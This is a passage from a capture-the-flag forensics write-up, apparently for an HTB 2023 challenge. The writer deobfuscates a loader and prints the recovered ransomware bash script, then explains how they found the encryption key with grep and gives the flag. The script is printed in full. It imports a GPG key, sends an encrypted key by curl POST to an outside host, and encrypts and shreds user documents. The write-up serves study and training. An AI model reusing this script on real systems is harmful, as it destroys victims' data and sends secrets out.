OxGVwUVVjpXSW10cONDZSx2aUVkT6ZldBRUYyg2VTJTREJFNvZ0YHZlVPtGdH1Uc1IDTVp1aSRDbYdVY0tmWZRGWZVkRw4EMjR1YLl1MOllTFNWNwdkWNlTeNlnTU50VwVUT0kjMLhkTWd1MnpWT6RWMWBlWrZVMFNTU2lEbiJDdH9Uc0lWYEhWRhRTRG5EdGVkTuxmVlBDa6tkMOR1UpZ1aDNDcyE1RkBjY5NHMN1EetJVWaBTVsZURPdXV6p1MsNjUIZEbR5kWwMWRshVY1JkbW5kRuFWYOpmV2YVVSpEbEJFWSVVUFpEMjZXRUlVUktWUPRWVVRHcnNEdwMFT0BTeTRUOFR1QCN1VGRXRJREbFR1QWZUVnFUMSFlQpRlSkVlUDFzUMRHMTxkI9oGZPl3MLdzb0UmV5pGb0lgC7BSKo0UW6RnYzR1Q2YkTYF0M3gHSNZUdKg2chJ2LulmYvEyI </span></span></span><span class="line"><span class="cl"><span class="s2">&#39; | r&#34;</span><span class="p">;</span><span class="n">HxJ</span><span class="p">=</span><span class="s2">&#34;s&#34;</span><span class="p">;</span><span class="n">Hc2</span><span class="p">=</span><span class="s2">&#34;&#34;</span><span class="p">;</span><span class="n">f</span><span class="p">=</span><span class="s2">&#34;as&#34;</span><span class="p">;</span><span class="n">kcE</span><span class="p">=</span><span class="s2">&#34;pas&#34;</span><span class="p">;</span><span class="n">cEf</span><span class="p">=</span><span class="s2">&#34;ae&#34;</span><span class="p">;</span><span class="n">d</span><span class="p">=</span><span class="s2">&#34;o&#34;</span><span class="p">;</span><span class="n">V9z</span><span class="p">=</span><span class="s2">&#34;6&#34;</span><span class="p">;</span><span class="n">P8c</span><span class="p">=</span><span class="s2">&#34;if&#34;</span><span class="p">;</span><span class="n">U</span><span class="p">=</span><span class="s2">&#34; -d&#34;</span><span class="p">;</span><span class="n">Jc</span><span class="p">=</span><span class="s2">&#34;ef&#34;</span><span class="p">;</span><span class="n">N0q</span><span class="p">=</span><span class="s2">&#34;&#34;</span><span class="p">;</span><span class="n">v</span><span class="p">=</span><span class="s2">&#34;b&#34;</span><span class="p">;</span><span class="n">w</span><span class="p">=</span><span class="s2">&#34;e&#34;</span><span class="p">;</span><span class="n">b</span><span class="p">=</span><span class="s2">&#34;v |&#34;</span><span class="p">;</span><span class="n">Tx</span><span class="p">=</span><span class="s2">&#34;Eds&#34;</span><span class="p">;</span><span class="n">xZp</span><span class="p">=</span><span class="s2">&#34;&#34;</span> </span></span><span class="line"><span class="cl"><span class="n">x</span><span class="p">=$(</span><span class="n">eval</span> <span class="s2">&#34;$Hc2$w$c$rQW$d$s$w$b$Hc2$v$xZp$f$w$V9z$rQW$L$U$xZp&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">eval</span> <span class="s2">&#34;$N0q$x$Hc2$rQW&#34;</span> </span></span></code></pre></div><p>After using python to concat these strings, I got a <code>base64</code> string, decoded it and I got a bash script:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="cp">#!/bin/bash </span></span></span><span class="line"><span class="cl"><span class="cp"></span>uFMHx73AXNF6CTsbtzYM<span class="o">()</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="nv">tljyVe4o7K3yOdj</span><span class="o">=</span><span class="s2">&#34;LS0tLS1CRUdJTiBQR1AgUFVCTElDIEtFWSBCTE9DSy0tLS0tCgptUUdOQkdQYTEvc0JEQURXRDlJRUV6VjNaanFNVnBuaXlEc0ZNQlFHR3l3ZzUwOEFlU0ZYRmxMM0syb0dGQ2p3CkViSTN2Kzh0eVlnNEFtNFE4aEhDaitqOGt2blIvQ3E1VkZPV1dzMjg3WVNHK294MEpWNTNyMy9MZGp5cENYN3YKcTc0N0FEYXdYZktaWXl4RkZUL25qMGtkOVVGcFo4RDE2SWh2aDAvVzNETklRd3NsMVIzcUU0TlNVSWl5WkxINQphbElWYzFnM0lzeHlDZXBiQXErUjJOZEFTWXRZdzM3NDV3Z2FhMUdsc3FSL04vd0QwMWlmaXNBbUxYV0xVUmRxClliU3lTeUM1V3h0cTlOZ3lRQUN5YXZGUEVzcC9VNmNKU2pmSGdUNGhzQmtoTFZhL29GVmxQdnIvdEhkSytXMHoKMkxmVTg0cVFoRXB3d3NYWHdOYWZvNE82ckJjNXBpQmYwa0FmbFh6VHZpdWhFcHRodTBtM3UxbWwydnIrNTc0Mwo1OGU4ODg4STRTOElLNE5PRUZFbzBHNC9nSUlZWU1ValExWXJMbmRZRlFkSzc4MUJBSnNkT2JLT3hFQk5vdVkxCkZCcjh0VjJCT1MxTDdBTjdrcU9FeGY2MWsxUVozdGtQWWZkWHdaKzVUL3kzYW5BcS8xQmtvUlljcUJwak9XMEsKUXlRYkU3bWNHNTdqNW04QUVRRUFBYlFkVW1GdWMyOXRTMlY1SUR4eVlXNXpiMjFBYUdGamF5NXNiMk5oYkQ2SgpBYzRFRXdFS0FEZ1dJUVFWWjZNdzBtTlFqZklJQUVqL1J3MGJrcFJpVmdVQ1k5clgrd0liQXdVTENRZ0hBZ1lWCkNna0lDd0lFRmdJREFRSWVBUUlYZ0FBS0NSRC9SdzBia3BSaVZ1YjBDLzQxeFV6c24vZzI1Njdad3BZdlhEeDcKaklHK2RIV0FhYndFUUZZa2J4VEN1a3FWbXhvQzhJZ0U4a0lQdDhvZ2V3SnI5d3dFY2VheTFkZTUxaDZuTFd0TgpFRUVDMEVQck1UQnAzVkhBOGgrbG1vZXB3NXNXNzRJeERkbTNJVU9WSmluRENlYmRxZGZXMnAwZmVwSjArZGl1Clh0cnE2RVNxblUyMFlNK2t4SlM4TkJYb2FlUkNISnRWLzg5ZnZYSWJoT285dmpsdS9YWHUrWTFpR1gyVHN3RFkKTmFheFc5Ymlrb2xHRzdXYkpUYk5XSEx2VTY4aGxsbWtaMDB6a0lSNHc2alc0TUJkTkZ6VFVSbEJ4MWlYbGw1SwpUQWVnWC9SdFZmeSt0aEdrbFJFQ3BPT1dpY1dCeFdyeTFKSW5UR1BtZnpKaEZWOU5WU0ROWEdteGZ1YVRXZUhICnRDMG9FMkxKZVlyakRNV0xnR0VXTERMYlhDdURtZXo1M0dwSjN2MHlGckplNGkyZVI1Z0x1OG9UNWlaV0xDNnYKMzdQeVc3bXYyeHZQNGNlZExZdk1CMVZ1UlBuSW01T1U2UjJtelNHQS8zNnBKWHhYU3RjY01JamJ5dDNUbFNxbAordHJyQ2ZHUzNjMzRzVmgrN1RNUHRHZTdCbHR4ZjI5UzhMd1dudUt1R00rNUFZMEVZOXJYK3dFTUFLNW0vdm1TCmJTb3p0cXFzV1dpNTN1UFJ3UWxqejZHd0g5emhDbENzRW4xZk9QRktZc0JLcmpFQXpsRUZ2VTh3UGhiVm5EdFAKNERtRFp0Wk9UN3pxSjFseUdXUnliOEdjSnpHWXYvRDJVcnZaMVZCUHBoUlVNU2lQZUljNnk0ckI5Vkh5ZjVRNApwdmFub1hlWVkyYVd4S09zdUl2aUJDRkJWalE0Q0dqbUlBMkZOdWFwZEFnSFZJRHZmTU9nblorbnRFNVdhSWZlCjBCdzlMK05OaTloV04vODlnMG9BeDNDVksybVVPUUJ3Z3NBR1kvdFdjc3lGc3YwWlRBLzczRXg0U05VMXdtUG0KeDNheVVsTjhhRENPMlhaanBpMitLY0NOV2hpYmFKbWp5SkZzK3ZIbzJ6TlpDaExGQWtObmZzSHczdHdTU1ZNQQovck56UE0zU2xhb2QvK2dDY0xEUEh0Y0xpcGF3RXlHcWRtd0hBakpTaEt4eFJpaG1YbzVoRjc1bUF3ckNSL2g5Ck1zb0phOW5DMDF5NXBMemZ4c1ZZRzBneXhyamdLVEpGcElCWDJ5SmtPSHlDMndrWUg2aVZxbDExMnRmOHpNZ3gKYWFmQnFqenNMZWNzcXZzYzA5SHRnZnpWZVM1bXpUN2dLajMxeXNuNjZxMCtmOVBXREJ5RzF3aHVUUUFSQVFBQgppUUcyQkJnQkNnQWdGaUVFRldlak1OSmpVSTN5Q0FCSS8wY05HNUtVWWxZRkFtUGExL3NDR3d3QUNna1EvMGNOCkc1S1VZbFpBOUF3QXRNOTVITk5QcWVqR0RwZmhmSUhWdy9HZkhKaGRpeUQ2NXJxWE5XckZFdzVJYVpVeWl0WUMKUFVPbmE3bGtFSW05aEkyaVpKc04vWEVnMWw5TVhpRzBHTzRqTjhvT0ZybnNHb3NNbUNJS2p3eDR5US9oTndKNQpuM3Fvb1cvRlErQTRQNmkvZDJERGtZK2NEdDhpUm1LTUhLa3dZcU9VV0hob2wwT3JwT1lYUUIrTjdwSFg5dCtaCld0NjU5YkxpUzRlcGt6YzRDUm9OSHZhZnY0bFdKaGJtWnowSitFd0U2QlBoNWN4WDA3aUEwbDdobjBQSW1jZ0gKKzdUL0xlZWZseHNKeXpiUWlXakd0UC9Ia2ZpbGg5ZStjSjZWcjlsNSs5SEFHaVB1L0JWK05qcTdCb2Mwc0lUKwpLbGFkVzJoUFV1WnQyeSsxaWg3NUtrZGdWb3k0amhhMENsTE9aQ1ZtODhNTXRLWXJ0S2ttZUkrMUtJVFE1NWhGCmRuYWZtaWdxcjB5M0dVTVBseFRRVmR5ZElnRHNzSXhWdlptWG8rd3lNbE4vL0hTS1Q5ZnpwOHhQL1g5bjhZWDcKcmZ1SkdBd3JKbWVLVFdHRWhrOUdOLzk2RTV6N2JOS2RQcWI5WHN3enF4QjMvVTBPWGRHemNpK1h6VURVVVI5cwo3S2dCZ3VXY0xXYWUKPXFqVzcKLS0tLS1FTkQgUEdQIFBVQkxJQyBLRVkgQkxPQ0stLS0tLQ==&#34;</span> </span></span><span class="line"><span class="cl"> <span class="nb">echo</span> <span class="nv">$tljyVe4o7K3yOdj</span> <span class="p">|</span> base64 --decode <span class="p">|</span> gpg --import </span></span><span class="line"><span class="cl"> <span class="nb">echo</span> -e <span class="s2">&#34;5\ny\n&#34;</span> <span class="p">|</span> gpg --command-fd <span class="m">0</span> --edit-key <span class="s2">&#34;RansomKey&#34;</span> trust </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span><span class="line"><span class="cl">MMYPE1MNIGuGPBmyCUo6<span class="o">()</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="nv">DhQ52B6UugM1WcX</span><span class="o">=</span><span class="sb">`</span>strings /dev/urandom <span class="p">|</span> grep -o <span class="s1">&#39;[[:alnum:]]&#39;</span> <span class="p">|</span> head -n <span class="m">16</span> <span class="p">|</span> tr -d <span class="s1">&#39;\n&#39;</span><span class="sb">`</span> </span></span><span class="line"><span class="cl"> <span class="nb">echo</span> <span class="nv">$DhQ52B6UugM1WcX</span> &gt; RxgXlDqP0h3baha </span></span><span class="line"><span class="cl"> gpg --batch --yes -r <span class="s2">&#34;RansomKey&#34;</span> -o qgffrqdGlfhrdoE -e RxgXlDqP0h3baha </span></span><span class="line"><span class="cl"> shred -u RxgXlDqP0h3baha </span></span><span class="line"><span class="cl"> curl --request POST --data-binary <span class="s2">&#34;@qgffrqdGlfhrdoE&#34;</span> https://files.pypi-install.com/packages/recv.php </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">for</span> i in *.txt *.doc *.docx *.pdf *.kdbx *.gz *.rar<span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">do</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="o">[[</span> <span class="si">${</span><span class="nv">i</span><span class="si">}</span> !<span class="o">=</span> *<span class="s2">&#34;*.&#34;</span>* <span class="o">]]</span><span class="p">;</span><span class="k">then</span> </span></span><span class="line"><span class="cl"> <span class="nb">echo</span> <span class="nv">$DhQ52B6UugM1WcX</span> <span class="p">|</span> gpg --batch --yes -o <span class="s2">&#34;</span><span class="nv">$i</span><span class="s2">&#34;</span>.a59ap --passphrase-fd <span class="m">0</span> --symmetric --cipher-algo AES256 <span class="s2">&#34;</span><span class="nv">$i</span><span class="s2">&#34;</span> 2&gt;/dev/null </span></span><span class="line"><span class="cl"> shred -u <span class="s2">&#34;</span><span class="nv">$i</span><span class="s2">&#34;</span> 2&gt;/dev/null </span></span><span class="line"><span class="cl"> <span class="k">fi</span> </span></span><span class="line"><span class="cl"> <span class="k">done</span> </span></span><span class="line"><span class="cl"> <span class="nb">unset</span> DhQ52B6UugM1WcX </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span><span class="line"><span class="cl">v0nPa1GinWR3Dr27cnmT<span class="o">()</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="c1"># Just a function to print strings</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span><span class="line"><span class="cl">ExoPFDWb3uT189e<span class="o">()</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> uFMHx73AXNF6CTsbtzYM </span></span><span class="line"><span class="cl"> MMYPE1MNIGuGPBmyCUo6 </span></span><span class="line"><span class="cl"> v0nPa1GinWR3Dr27cnmT </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="o">[[</span> <span class="s2">&#34;</span><span class="k">$(</span>whoami<span class="k">)</span><span class="s2">&#34;</span> <span class="o">==</span> <span class="s2">&#34;developer7669633432&#34;</span> <span class="o">]]</span><span class="p">;</span> <span class="k">then</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="o">[</span> -x <span class="s2">&#34;</span><span class="k">$(</span><span class="nb">command</span> -v gpg<span class="k">)</span><span class="s2">&#34;</span> <span class="o">]</span><span class="p">;</span> <span class="k">then</span> </span></span><span class="line"><span class="cl"> ExoPFDWb3uT189e </span></span><span class="line"><span class="cl"> <span class="nb">exit</span> <span class="m">1</span> </span></span><span class="line"><span class="cl"> <span class="k">fi</span> </span></span><span class="line"><span class="cl"><span class="k">fi</span> </span></span></code></pre></div><h3 id="2-bash-script-analyze">2. Bash script analyze</h3> <p>I used ChatGPT to analyze the script, it was much faster than if I analyzed it by myself. There are two functions that we need to notice, <code>uFMHx73AXNF6CTsbtzYM</code> and <code>MMYPE1MNIGuGPBmyCUo6</code>.</p> <p>The <code>uFMHx73AXNF6CTsbtzYM</code> function decodes a <code>base64</code> string and imports as a key using <code>GPG</code>.</p> <p>The <code>MMYPE1MNIGuGPBmyCUo6</code> function will generate a random string of <code>16</code> bytes consists of only alphabet and numbers. Then, it encrypts all files with <code>GPG</code> using the random string as the private key.</p> <p>Now to find private key, we will immediately think of using <code>volatility3</code> to find the key in the mem file, as they are the only file that hasn&rsquo;t been used. However, in this writeup I will present to you an <code>unintended solution</code> as I didn&rsquo;t figure out to solve it using <code>vol3</code> in contest&rsquo;s time.</p> <p>My unintended solution was a famous trick in forensics, <code>grep</code>. I used GPT to generate a grep command to find a string of <code>16</code> bytes consists of only alphabet and numbers.</p> <img src="003.png" alt="dnSpy" width="1000"/> <p>I try some sussy strings and found that the private key is <code>wJ5kENwyu8amx2RM</code>. Now we just need to decrypt the flag file and get the flag.</p> <p>Flag is <strong>HTB{n0_n33d_t0_r3turn_th3_r3l1c_1_gu3ss}</strong></p> <h2 id="original-posts">Original Posts</h2> <ul> <li> <p><a href="https://junvalentine.github.io/posts/htb-wu-2023/" target="_blank" rel="noopener">From Onirique</a></p> </li> <li> <p><a href="https://fazect.github.io/htb2023/" target="_blank" rel="noopener">From FazeCT</a></p> </li> </ul>